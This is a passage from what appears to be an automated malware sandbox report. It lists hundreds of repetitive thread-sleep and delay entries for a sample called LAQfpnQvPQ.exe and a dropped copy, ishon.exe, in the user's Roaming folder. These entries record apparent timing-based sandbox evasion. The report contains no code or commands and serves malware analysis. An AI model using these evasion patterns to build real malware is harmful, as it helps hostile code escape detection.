                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 595002Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594875Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594547Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594437Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeThread delayed: delay time: 594328Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeWindow / User API: threadDelayed 2068Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeWindow / User API: threadDelayed 6082Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeWindow / User API: threadDelayed 2211Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeWindow / User API: threadDelayed 7621Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWindow / User API: threadDelayed 3282Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWindow / User API: threadDelayed 3123Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWindow / User API: threadDelayed 4438Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeWindow / User API: threadDelayed 5404Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 1816Thread sleep count: 2068 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 1816Thread sleep count: 6082 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -99547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -99437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -99317s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -99187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -99078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -98969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -98844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -98734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -98623s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -98515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -98406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -98296s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -98175s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -98042s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -97937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -97827s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -97718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -97605s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -97500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -97390s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -97280s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -97172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -97047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96594s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -96047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -95937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -95828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 2412Thread sleep time: -95718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 6020Thread sleep count: 2211 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 6020Thread sleep count: 7621 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599669s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599526s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599179s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -599072s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598624s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -598078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597968s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597859s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597749s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597640s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -597153s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596779s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596637s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -596093s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -595000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594561s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594230s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -594089s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -593967s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe TID: 4072Thread sleep time: -593859s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5744Thread sleep count: 3282 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5136Thread sleep count: 3123 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99853s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99749s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99625s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99427s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99303s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99137s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -99015s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98905s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98797s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98467s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98357s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -98015s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97906s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97796s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97468s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97359s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97250s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97140s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -97031s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -96921s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -96812s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -96506s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -96375s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 1532Thread sleep time: -96265s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep count: 41 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -37815825351104557s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5244Thread sleep count: 4438 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599812s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599702s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599593s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5244Thread sleep count: 5404 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599484s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599373s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599265s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599155s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -599047s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598937s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598828s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598718s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598499s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598390s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598171s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -598062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597843s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597623s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597515s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597405s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -597253s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596984s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596874s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596328s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596218s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596109s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -596000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595671s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595342s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595124s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -595002s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594875s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5272Thread sleep time: -594328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 99437Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 99317Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 99187Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 99078Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 98969Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 98844Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 98734Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 98623Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 98515Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 98406Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 98296Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 98175Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 98042Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 97937Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 97827Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 97718Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 97605Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 97500Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 97390Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 97280Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 97172Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 97047Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 96937Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 96828Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 96719Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 96594Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 96484Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 96375Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 96265Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 96156Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 96047Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 95937Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 95828Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 95718Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599669Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599526Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599406Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599297Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599179Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 599072Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeThread delayed: delay time: 598953Jump to behavior
